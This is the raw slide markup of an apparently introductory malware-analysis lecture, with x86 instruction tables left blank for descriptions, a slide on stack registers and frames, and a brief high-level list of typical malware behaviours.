                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="447120">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mov</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx+esi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>*4]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>lea </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, [ebx+8]</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>sub </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 0x10</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="425325">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>add </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ebx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB"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70087771"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4644008" y="1772816"/>
          <a:ext cx="4248108" cy="4640881"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="1584176"/>
                <a:gridCol w="2663932"/>
              </a:tblGrid>
              <a:tr h="792088">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Instruction</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>Description</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>inc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>edx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>dec</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ecx</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>mul</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> 0x50</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>div 0x75</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="450867">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>xor</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>shl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>eax</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ror</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="485418">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-GB" sz="2200" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>nop</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-GB" sz="2200" dirty="0">
                        <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-GB" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4015319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behaviour</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Malware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>behaviour </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>usually to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>crucial files on a computer to render it unusable without a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>recovery process</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Log</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>every keyboard input to see what the users type.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Steal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>personal or sensitive information or files from a computer.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>a computer’s resources for the purpose of the malware, e.g. send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>spam emails</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, DDoS another system, or brute-force encryption keys</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="189105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a:xfrm>
            <a:off x="179513" y="1196752"/>
            <a:ext cx="5616624" cy="5112568"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" smtClean="0"/>
              <a:t>The Stack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>: LIFO structure for storing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Local variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Parameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> of functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Flow control </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>of the program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Uses registers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>ESP: stack pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Address of the top of the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>EBP: base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Keep track of the location of local variables and parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enter, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3000" dirty="0" smtClean="0">
                <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pop, call, leave, ret</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="3000" dirty="0">
              <a:latin typeface="Agency FB" panose="020B0503020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="13" name="Group 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5940152" y="1728029"/>
            <a:ext cx="2592288" cy="4293259"/>
            <a:chOff x="5940152" y="2097361"/>
            <a:chExt cx="2592288" cy="4293259"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="Rectangle 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5940152" y="2492896"/>
              <a:ext cx="2592288" cy="3528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156176" y="3361398"/>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131385" y="4257092"/>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146463" y="5144481"/>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6191715" y="3500768"/>
              <a:ext cx="2089162" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-GB" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Current Stack Frame</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="TextBox 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6164088" y="4396462"/>
              <a:ext cx="2053575" cy="369332"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
